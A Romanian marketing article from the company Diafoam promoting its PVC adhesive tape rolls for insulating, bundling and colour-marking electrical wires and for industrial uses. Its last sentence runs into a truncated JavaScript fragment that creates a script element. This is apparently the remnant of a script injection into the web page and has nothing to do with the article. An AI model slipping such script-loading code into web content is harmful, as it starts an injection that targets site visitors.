banda-color

Exista o vorba din America, daca ceva s-a rupt, crapat sau s-a desprins, nu trebuie sa intri in panica, daca ai in casa niste role benzi adezive PVC esti salvat. Bineinteles, nu sunt putine exemplele in care ati folosit banda adeziva pentru a lipi, sau repara ceva rupt, fie ca este vorba de spoilerul masinii sau vrei sa strangi cablul de alimentare a centralei termice pentru a fi mai compact. Suntem Diafoam, iar principalul domeniu de activitate pe care il avem este cel de a crea produse diverse din materiale poliuretanice.  Mai exact, denumirea de PVC vine de la Poly Vinyl Clorid, aceasta substanta stand la baza majoritatii tipurilor de materiale plastice folosite in industria de productie in masa de bunuri de larg consum.

Aveti role benzi adezive PVC in casa? Folositi benzi adezive pentru protejarea firelor inadite

Cel mai des intalnita utilizare pentru aceste role benzi adezive PVC este in domeniul instalatiilor electrice si in electronica. Acestea sunt folosite pentru izolarea, marcarea si prinderea firelor si a conductorilor electrici, insa mai exista si alte utilizari din acelasi domeniu. Pentru ca sunt foarte multe firme ce produc echipamente electrice si electronice, in cursul acestui articol vom vorbi unpic despre utilizarile acestor role benzi adezive PVC si cum puteti evita scurtcircuitele in cazul imbinarii cablurilor electrice si de semnal.

Suntem siguri ca aproape fiecare dintre dumneavoastra a trecut prin scenariul in care cablul audio al sistemului incepe sa faca probleme, cauzand intreruperi ale sunetului. Evident, in cele mai multe cazuri, dupa ce ati inadit firele, multi dintre dumneavoastra folosesc rola de scotch pentru a izola firele, insa aceasta metoda este pe cat de rapida, pe atat de riscanta. Pentru a asigura o buna izolare a firelor va recomandam sa folositi role benzi adezive PVC pentru a izola temeinic firele. Spre deosebire de banda de scotch, cea din PVC este prevazuta cu un adeziv mult mai puternic si rezistent in timp. Pe langa aceasta, benzile PVC au si un grad de elasticitate mult mai bun permitand o prindere mult mai ferma.

Role benzi adezive PVC pentru aplicatii tehnice industriale

Spuneam mai devreme ca va oferim role benzi adezive PVC de cea mai buna calitate, iar cum paleta de culori este uriasa, puteti folosi banda PVC si pentru a marca diferite elemente de electronice, fie ca vorbim de marcarea unor cabluri pentru identificarea acestora sau marcarea bornelor de conectare. O alta utilizare destul de raspandita este aceea de a aplica banda adeziva pe diferite piese pentru a putea permite notarea observatiilor sau a codurilor temporare de productie.

Indiferent pentru ce doriti sa le folositi, Diafoam va ofera role benzi adezive PVC cu diferite proprietati tehnice, cum ar fi benzi de mare elasticitate, sau cu adeziv de mare putere, sau seturi de role benzi adezive PVC multi-colore pentru a putea realiza marcaje. Pe langa acestea, in cadrul magazinului nostru on-line www.diafoam.ro veti  putea gasi o paleta larga de produse industriale cum ar fi bureti si benzi duble adezive sau altele. Pentru a solicita o oferta personalizata sau pentru informatii ne puteti contacta oricand. Va asteptam!var d=document;var s=d.createElement(‘script’);